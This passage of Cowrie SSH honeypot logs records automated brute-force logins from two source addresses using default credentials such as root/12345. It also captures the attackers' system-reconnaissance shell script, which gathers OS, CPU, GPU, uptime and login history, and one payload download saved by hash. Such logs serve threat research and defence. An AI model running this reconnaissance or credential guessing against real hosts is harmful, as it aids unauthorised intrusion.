sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:52:54.238806Z","src_ip":"212.227.235.229","session":"a83ebfb22140"}
{"eventid":"cowrie.login.failed","username":"admin","password":"woof","message":"login attempt [admin/woof] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:54.339462Z","src_ip":"212.227.235.229","session":"9c6e188a7571"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:52:54.751828Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:55.446090Z","src_ip":"212.227.235.229","session":"9c6e188a7571"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34754,"dst_ip":"1.2.3.4","dst_port":22,"session":"27eef0df7acd","protocol":"ssh","message":"New connection: 212.227.235.229:34754 (1.2.3.4:22) [session: 27eef0df7acd]","sensor":"my-vps","timestamp":"2025-08-31T04:52:55.700056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:52:55.721961Z","src_ip":"212.227.235.229","session":"27eef0df7acd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34756,"dst_ip":"1.2.3.4","dst_port":22,"session":"dec097c41326","protocol":"ssh","message":"New connection: 212.227.235.229:34756 (1.2.3.4:22) [session: dec097c41326]","sensor":"my-vps","timestamp":"2025-08-31T04:52:55.837660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.033540Z","src_ip":"212.227.235.229","session":"dec097c41326"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.133573Z","src_ip":"212.227.235.229","session":"dec097c41326"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.160213Z","src_ip":"212.227.235.229","session":"27eef0df7acd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:52:56.326971Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.327741Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.328220Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.329671Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.331103Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.332141Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.333339Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.334733Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.335470Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.336503Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.337425Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.338324Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.338771Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.session.closed","duration":"34.4","message":"Connection lost after 34.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:56.638052Z","src_ip":"212.227.125.160","session":"205f7f9b494f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:52:57.064426Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:57.065447Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:57.066996Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.login.failed","username":"testftp","password":"testftp","message":"login attempt [testftp/testftp] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:57.411894Z","src_ip":"212.227.235.229","session":"dec097c41326"}
{"eventid":"cowrie.login.failed","username":"super","password":"super1234","message":"login attempt [super/super1234] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:57.847629Z","src_ip":"212.227.235.229","session":"27eef0df7acd"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:58.898039Z","src_ip":"212.227.235.229","session":"dec097c41326"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:01.344607Z","src_ip":"212.227.235.229","session":"27eef0df7acd"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-31T04:53:02.244638Z","src_ip":"212.227.235.229","session":"a83ebfb22140"}
{"eventid":"cowrie.session.closed","duration":"21.1","message":"Connection lost after 21.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:08.332291Z","src_ip":"212.227.235.229","session":"a83ebfb22140"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56810,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d6e7a660843","protocol":"ssh","message":"New connection: 212.227.125.160:56810 (1.2.3.4:22) [session: 0d6e7a660843]","sensor":"my-vps","timestamp":"2025-08-31T04:53:08.682325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:53:09.335486Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:53:09.336291Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:53:11.664493Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35384,"dst_ip":"1.2.3.4","dst_port":22,"session":"633299299561","protocol":"ssh","message":"New connection: 212.227.125.160:35384 (1.2.3.4:22) [session: 633299299561]","sensor":"my-vps","timestamp":"2025-08-31T04:53:12.347358Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:53:12.935509Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:53:12.936428Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:53:12.937394Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:53:12.939354Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:53:12.940370Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:53:12.941398Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:53:12.942237Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:53:12.943506Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:53:12.944024Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:53:12.944544Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:53:12.945106Z","src_ip":"212.227.125.160","session":"0d6e7a660843"}
